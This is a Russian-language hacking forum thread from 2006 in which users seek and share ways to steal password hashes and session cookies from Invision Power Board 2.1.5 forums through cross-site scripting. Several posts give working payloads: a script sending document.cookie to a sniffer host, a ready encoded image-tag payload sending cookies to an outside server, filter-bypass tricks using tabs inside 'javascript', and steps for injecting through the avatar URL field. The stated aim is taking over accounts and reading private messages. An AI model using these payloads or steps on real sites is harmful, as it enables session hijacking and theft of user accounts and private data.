Форумы Invision 2.1.5 Xss

Обсуждение в разделе «Уязвимости CMS/форумов», начал(-а) sexxx, 9.04.2006.

  1. sexxx

    sexxx New Member

    Регистрация:
    3.04.2006
    Сообщения:
    8
    Одобрения:
    0
    Репутация:
    0
    Вобшем как можно унать хэш на это версии движка,
    помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.
     
  2. GreenBear

    GreenBear наркоман с медалью

    Регистрация:
    7.05.2005
    Сообщения:
    2 787
    Одобрения:
    1 410
    Репутация:
    393
    а попробовать? не работает.
     
    Это одобряет 1 пользователь.
  3. iNcluDe

    iNcluDe New Member

    Регистрация:
    7.03.2006
    Сообщения:
    12
    Одобрения:
    2
    Репутация:
    2
    Xss баг через репорт в 2.1.5 исправлен, он для 2.1.4
     
  4. sexxx

    sexxx New Member

    Регистрация:
    3.04.2006
    Сообщения:
    8
    Одобрения:
    0
    Репутация:
    0
    Спасибо буду знать, а не подскажете как нибудь там можно сваравать хэш, может сплойт есть. Знаю что гугл рулит, но всё так преятней узнать от знающих людей. ПРобывал сам поискать чтоб хэш cтырить, но что то не выходит.
     
  5. member_ru

    member_ru Elder - Старейшина

    Регистрация:
    8.12.2005
    Сообщения:
    46
    Одобрения:
    3
    Репутация:
    0
    sexxx, никак, пока XSSбаги там не нашли.
     
    Это одобряет 1 пользователь.
  6. Otaku

    Otaku Elder - Старейшина

    Регистрация:
    24.07.2005
    Сообщения:
    280
    Одобрения:
    73
    Репутация:
    4
    Пока ничего такого нет. Версия ещё девственная. В смысле не поимел пока никто.
    Можно через аватарку попробовать вроде бы. Но это только под Ie.
     
  7. CinerX

    CinerX Elder - Старейшина

    Регистрация:
    13.02.2006
    Сообщения:
    81
    Одобрения:
    17
    Репутация:
    9
    вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

    [​IMG]
     
    Это одобряют 3 пользоветелей.
  8. Noth!nG

    Noth!nG Elder - Старейшина

    Регистрация:
    8.03.2006
    Сообщения:
    32
    Одобрения:
    4
    Репутация:
    0
    Invision Power Board 2.1.5 до 2006-03-08 и версии до 2.1.x

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю произвести XSS нападение.

    Уязвимость существует из-за недостаточной обработки входных данных в модуле PM. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

    P.S.: В инете искать пробовали?
     
  9. 1SeTh

    1SeTh Elder - Старейшина

    Регистрация:
    17.02.2006
    Сообщения:
    165
    Одобрения:
    18
    Репутация:
    5
    Работает спасибо :)))
    а теперь после того как получил алерт что мне делать?
    заранее спасибо
     
  10. CinerX

    CinerX Elder - Старейшина

    Регистрация:
    13.02.2006
    Сообщения:
    81
    Одобрения:
    17
    Репутация:
    9
    тебе ввобщем надо получить куки припомощи JavaScript.
    вот пример:

    <script>
    img = new Image();
    img.src = "http://адресс_снифера?"+document.cookie;
    </script>

    только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)
     
  11. Otaku

    Otaku Elder - Старейшина

    Регистрация:
    24.07.2005
    Сообщения:
    280
    Одобрения:
    73
    Репутация:
    4
  12. 1SeTh

    1SeTh Elder - Старейшина

    Регистрация:
    17.02.2006
    Сообщения:
    165
    Одобрения:
    18
    Репутация:
    5
    Не понял вместо
    [​IMG]

    XSS вставить твой код? Тогда алерт заробает когда посетитель зайдет на ту страницу
    ???
     
  13. 1SeTh

    1SeTh Elder - Старейшина

    Регистрация:
    17.02.2006
    Сообщения:
    165
    Одобрения:
    18
    Репутация:
    5
    Попробал вот это
    [​IMG]

    и вот что мне выдал
    Sorry, dynamic pages in the tags are not allowed

    вместо знака вопроса пробавл вот это %3F затем ? и это &#63
     
  14. CinerX

    CinerX Elder - Старейшина

    Регистрация:
    13.02.2006
    Сообщения:
    81
    Одобрения:
    17
    Репутация:
    9
    Там надо пропустить тебе через http://ha.ckers.org/xss.html вот эти символы:
    " пробел ; ' + ?
    возможно еще [ ]

    Хм... Ты не правильно меня понял... Я не имел ввиду вставить в алерт вместо слова XSS я имел вставить вместо алерта. Т.е. после слова javascript =)
     
    #14 CinerX, 12.04.2006
    В последний раз редактировалось модератором: 12.04.2006
  15. Qwazar

    Qwazar Elder - Старейшина

    Регистрация:
    2.06.2005
    Сообщения:
    1 007
    Одобрения:
    908
    Репутация:
    367
    Хмм.. Ну никак не удаётся протащить ? и ;
     
  16. Grrl

    Grrl Elder - Старейшина

    Регистрация:
    17.07.2004
    Сообщения:
    180
    Одобрения:
    54
    Репутация:
    24
    там хэши наскоко помню соленые так что толку от xss ...
     
  17. Otaku

    Otaku Elder - Старейшина

    Регистрация:
    24.07.2005
    Сообщения:
    280
    Одобрения:
    73
    Репутация:
    4
    Почитать внутренние форумы и личные мессаги. Ещё поиграться.
     
  18. CinerX

    CinerX Elder - Старейшина

    Регистрация:
    13.02.2006
    Сообщения:
    81
    Одобрения:
    17
    Репутация:
    9
    Ввобщем этой XSS был подвержен damagelab.org вот видео http://dreamshell.h16.ru/hack/damagelab.rar

    Как я вижу ни кто куки и не стырил припомощи этой XSS. Эх... Вот готовый код для тырки кук:
    Code:
    [im*g]j	a	v	a	s	c	r	i	p	t:x=document.cookie%3Bimg=new%20Image()%3Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif[/im*g]
    
    пояснение:
    1)вместо пробелов в слове javascript ставим табуляцию. 2)После img.src= убираем пробел.
    3)Этот код пашет токо под ИЕ.
    4)Убираем звездочки только с тегов [​IMG]

    ПС просьба репу добавлять CinerX, а не _CinerX
     
    #18 CinerX, 14.04.2006
    В последний раз редактировалось модератором: 14.04.2006
    Это одобряет 1 пользователь.
  19. CinerX

    CinerX Elder - Старейшина

    Регистрация:
    13.02.2006
    Сообщения:
    81
    Одобрения:
    17
    Репутация:
    9
    Для Ipb 2.1.5:
    Заходим в профиль => смена аватары. Сохраняем страницу на винт редактируем, чтоб не было ограничений на ввод урла аватары. Ввобим код выши в поле грузить с урл и жмем сохранить аватару. Вот и все =)

    ПС репу поднимаем CinerX, а не _CinerX
     
  20. 1SeTh

    1SeTh Elder - Старейшина

    Регистрация:
    17.02.2006
    Сообщения:
    165
    Одобрения:
    18
    Репутация:
    5
    Sorry, that is not a valid file extension

    У меня не получаеться ничего (((
     
Загрузка...
Похожие темы
  1. Ответы:
    7
    Просмотры:
    1 274
  2. Ответы:
    6
    Просмотры:
    1 701
  3. Ответы:
    49
    Просмотры:
    14 105
  4. Ответы:
    106
    Просмотры:
    46 010
  5. Ответы:
    8
    Просмотры:
    4 959